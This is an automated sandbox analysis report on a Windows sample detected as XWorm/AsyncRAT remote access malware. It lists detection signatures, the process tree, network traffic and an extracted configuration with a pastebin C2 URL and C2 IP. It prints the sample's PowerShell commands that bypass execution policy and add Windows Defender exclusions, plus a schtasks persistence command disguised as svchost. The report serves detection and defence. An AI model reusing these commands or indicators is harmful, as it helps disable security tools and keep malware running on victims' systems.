Edit tour

Windows Analysis Report
a9YMw44iQq.exe

Overview

General Information

Sample name:	a9YMw44iQq.exe renamed because original name is a hash value
Original sample name:	4854a1611616f474d7241dc0268f913f92887a383a81e2dba1186c358cf93f22.exe
Analysis ID:	1570400
MD5:	f068a2f351d11284fee8d768a64f6c9c
SHA1:	6fcba43b6b6024c8795d699f638444654714c276
SHA256:	4854a1611616f474d7241dc0268f913f92887a383a81e2dba1186c358cf93f22
Tags:	exeuser-Chainskilabs
Infos:

Detection

AsyncRAT, XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Schedule system process

Suricata IDS alerts for network traffic

Yara detected AsyncRAT

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Check if machine is in data center or colocation facility

Connects to a pastebin service (likely for C&C)

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Drops PE files with benign system names

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Protects its processes via BreakOnTermination flag

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Potentially Suspicious Malware Callback Communication

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspect Svchost Activity

Sigma detected: System File Execution Location Anomaly

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

a9YMw44iQq.exe (PID: 6216 cmdline: "C:\Users\user\Desktop\a9YMw44iQq.exe" MD5: F068A2F351D11284FEE8D768A64F6C9C)

powershell.exe (PID: 2444 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2308 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'a9YMw44iQq.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4044 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1088 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6416 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 3744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

svchost.exe (PID: 2716 cmdline: C:\ProgramData\svchost.exe MD5: F068A2F351D11284FEE8D768A64F6C9C)

svchost.exe (PID: 1016 cmdline: C:\ProgramData\svchost.exe MD5: F068A2F351D11284FEE8D768A64F6C9C)

svchost.exe (PID: 5832 cmdline: "C:\ProgramData\svchost.exe" MD5: F068A2F351D11284FEE8D768A64F6C9C)

svchost.exe (PID: 6400 cmdline: "C:\ProgramData\svchost.exe" MD5: F068A2F351D11284FEE8D768A64F6C9C)

svchost.exe (PID: 4148 cmdline: C:\ProgramData\svchost.exe MD5: F068A2F351D11284FEE8D768A64F6C9C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["https://pastebin.com/raw/vJmE27fr"], "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "svchost.exe"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
a9YMw44iQq.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
a9YMw44iQq.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
a9YMw44iQq.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xf2c5:$s6: VirtualBox 0xf223:$s8: Win32_ComputerSystem 0x122cb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x12368:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1247d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x115d7:$cnc4: POST / HTTP/1.1

Dropped Files

Source	Rule	Description	Author	Strings
C:\ProgramData\svchost.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\ProgramData\svchost.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\ProgramData\svchost.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xf2c5:$s6: VirtualBox 0xf223:$s8: Win32_ComputerSystem 0x122cb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x12368:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1247d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x115d7:$cnc4: POST / HTTP/1.1

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.3369216430.0000000002401000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000000.2110037183.0000000000152000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000000.2110037183.0000000000152000.00000002.00000001.01000000.00000003.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xf0c5:$s6: VirtualBox 0xf023:$s8: Win32_ComputerSystem 0x120cb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x12168:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1227d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x113d7:$cnc4: POST / HTTP/1.1
Process Memory Space: a9YMw44iQq.exe PID: 6216	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: a9YMw44iQq.exe PID: 6216	JoeSecurity_XWorm	Yara detected XWorm	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.a9YMw44iQq.exe.150000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.0.a9YMw44iQq.exe.150000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.0.a9YMw44iQq.exe.150000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xf2c5:$s6: VirtualBox 0xf223:$s8: Win32_ComputerSystem 0x122cb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x12368:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1247d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x115d7:$cnc4: POST / HTTP/1.1

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\a9YMw44iQq.exe, ProcessId: 6216, TargetFilename: C:\ProgramData\svchost.exe

Sigma detected: Potentially Suspicious Malware Callback Communication

Source: Network Connection

Author: Florian Roth (Nextron Systems): Data: DestinationIp: 5.166.171.54, DestinationIsIpv6: false, DestinationPort: 5552, EventID: 3, Image: C:\Users\user\Desktop\a9YMw44iQq.exe, Initiated: true, ProcessId: 6216, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49819

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\a9YMw44iQq.exe", ParentImage: C:\Users\user\Desktop\a9YMw44iQq.exe, ParentProcessId: 6216, ParentProcessName: a9YMw44iQq.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe', ProcessId: 2444, ProcessName: powershell.exe

Sigma detected: Suspect Svchost Activity

Source: Process started

Author: David Burkett, @signalblur: Data: Command: C:\ProgramData\svchost.exe, CommandLine: C:\ProgramData\svchost.exe, CommandLine|base64offset|contains: , Image: C:\ProgramData\svchost.exe, NewProcessName: C:\ProgramData\svchost.exe, OriginalFileName: C:\ProgramData\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\ProgramData\svchost.exe, ProcessId: 2716, ProcessName: svchost.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\ProgramData\svchost.exe, CommandLine: C:\ProgramData\svchost.exe, CommandLine|base64offset|contains: , Image: C:\ProgramData\svchost.exe, NewProcessName: C:\ProgramData\svchost.exe, OriginalFileName: C:\ProgramData\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\ProgramData\svchost.exe, ProcessId: 2716, ProcessName: svchost.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\a9YMw44iQq.exe", ParentImage: C:\Users\user\Desktop\a9YMw44iQq.exe, ParentProcessId: 6216, ParentProcessName: a9YMw44iQq.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe', ProcessId: 2444, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\a9YMw44iQq.exe, ProcessId: 6216, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\a9YMw44iQq.exe, ProcessId: 6216, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\a9YMw44iQq.exe", ParentImage: C:\Users\user\Desktop\a9YMw44iQq.exe, ParentProcessId: 6216, ParentProcessName: a9YMw44iQq.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\a9YMw44iQq.exe', ProcessId: 2444, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\ProgramData\svchost.exe, CommandLine: C:\ProgramData\svchost.exe, CommandLine|base64offset|contains: , Image: C:\ProgramData\svchost.exe, NewProcessName: C:\ProgramData\svchost.exe, OriginalFileName: C:\ProgramData\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\ProgramData\svchost.exe, ProcessId: 2716, ProcessName: svchost.exe

Persistence and Installation Behavior

Sigma detected: Schedule system process

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\a9YMw44iQq.exe", ParentImage: C:\Users\user\Desktop\a9YMw44iQq.exe, ParentProcessId: 6216, ParentProcessName: a9YMw44iQq.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe", ProcessId: 6416, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-06T22:52:08.141883+0100	2855924	1	Malware Command and Control Activity Detected	192.168.2.6	49819	5.166.171.54	5552	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: a9YMw44iQq.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\ProgramData\svchost.exe

Avira: detection malicious, Label: TR/Spy.Gen

Found malware configuration

Source: a9YMw44iQq.exe

Malware Configuration Extractor: Xworm {"C2 url": ["https://pastebin.com/raw/vJmE27fr"], "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "svchost.exe"}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\svchost.exe

ReversingLabs: Detection: 76%

Multi AV Scanner detection for submitted file

Source: a9YMw44iQq.exe

ReversingLabs: Detection: 76%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\ProgramData\svchost.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: a9YMw44iQq.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: a9YMw44iQq.exe	String decryptor: https://pastebin.com/raw/vJmE27fr
Source: a9YMw44iQq.exe	String decryptor: <123456789>
Source: a9YMw44iQq.exe	String decryptor: <Xwormmm>
Source: a9YMw44iQq.exe	String decryptor: Test
Source: a9YMw44iQq.exe	String decryptor: svchost.exe
Source: a9YMw44iQq.exe	String decryptor: %ProgramData%

Source: a9YMw44iQq.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.6:49812 version: TLS 1.2

Source: a9YMw44iQq.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49819 -> 5.166.171.54:5552

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://pastebin.com/raw/vJmE27fr

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: pastebin.com

Yara detected Generic Downloader

Source: Yara match	File source: a9YMw44iQq.exe, type: SAMPLE
Source: Yara match	File source: 0.0.a9YMw44iQq.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\ProgramData\svchost.exe, type: DROPPED

Source: global traffic

TCP traffic: 192.168.2.6:49819 -> 5.166.171.54:5552

Source: global traffic	HTTP traffic detected: GET /raw/vJmE27fr HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 172.67.19.24 172.67.19.24
Source: Joe Sandbox View	IP Address: 172.67.19.24 172.67.19.24

Source: Joe Sandbox View

ASN Name: ER-TELECOM-ASRU ER-TELECOM-ASRU

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: ip-api.com

Source: unknown	TCP traffic detected without corresponding DNS query: 5.166.171.54
Source: unknown	TCP traffic detected without corresponding DNS query: 5.166.171.54
Source: unknown	TCP traffic detected without corresponding DNS query: 5.166.171.54
Source: unknown	TCP traffic detected without corresponding DNS query: 5.166.171.54
Source: unknown	TCP traffic detected without corresponding DNS query: 5.166.171.54
Source: unknown	TCP traffic detected without corresponding DNS query: 5.166.171.54
Source: unknown	TCP traffic detected without corresponding DNS query: 5.166.171.54
Source: unknown	TCP traffic detected without corresponding DNS query: 5.166.171.54
Source: unknown	TCP traffic detected without corresponding DNS query: 5.166.171.54
Source: unknown	TCP traffic detected without corresponding DNS query: 5.166.171.54
Source: unknown	TCP traffic detected without corresponding DNS query: 5.166.171.54
Source: unknown	TCP traffic detected without corresponding DNS query: 5.166.171.54
Source: unknown	TCP traffic detected without corresponding DNS query: 5.166.171.54
Source: unknown	TCP traffic detected without corresponding DNS query: 5.166.171.54
Source: unknown	TCP traffic detected without corresponding DNS query: 5.166.171.54
Source: unknown	TCP traffic detected without corresponding DNS query: 5.166.171.54
Source: unknown	TCP traffic detected without corresponding DNS query: 5.166.171.54
Source: unknown	TCP traffic detected without corresponding DNS query: 5.166.171.54
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /raw/vJmE27fr HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: pastebin.com

Source: powershell.exe, 0000000B.00000002.2623275367.000001B5FF774000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.miB
Source: a9YMw44iQq.exe, 00000000.00000002.3410060058.000000001BD80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000005.00000002.2318854138.00000215B83B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsx
Source: a9YMw44iQq.exe, svchost.exe.0.dr	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000002.00000002.2220656661.000002336FF53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2303817194.00000215AFC13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2437806103.000002AD6C363000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.2493300530.000001B581639000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2197736957.0000023360108000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2253293578.000002159FDCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2350862224.000002AD5C519000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2493300530.000001B581639000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: a9YMw44iQq.exe, 00000000.00000002.3369216430.0000000002401000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2197736957.000002335FEE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2253293578.000002159FBA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2350862224.000002AD5C2F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2493300530.000001B581411000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2197736957.0000023360108000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2253293578.000002159FDCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2350862224.000002AD5C519000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2493300530.000001B581639000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000B.00000002.2493300530.000001B581639000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2226616420.0000023378537000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
Source: powershell.exe, 00000002.00000002.2226475493.0000023378450000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000005.00000002.2318854138.00000215B83B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.coJ
Source: powershell.exe, 0000000B.00000002.2623275367.000001B5FF774000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.coK
Source: powershell.exe, 00000002.00000002.2197736957.000002335FEE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2253293578.000002159FBA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2350862224.000002AD5C2F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2493300530.000001B581411000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.2437806103.000002AD6C363000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.2437806103.000002AD6C363000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.2437806103.000002AD6C363000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000B.00000002.2493300530.000001B581639000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.2458910527.000002AD747D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ion=v4.5
Source: powershell.exe, 00000002.00000002.2220656661.000002336FF53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2303817194.00000215AFC13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2437806103.000002AD6C363000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000012.00000002.2864690740.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/vJmE27fr

Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
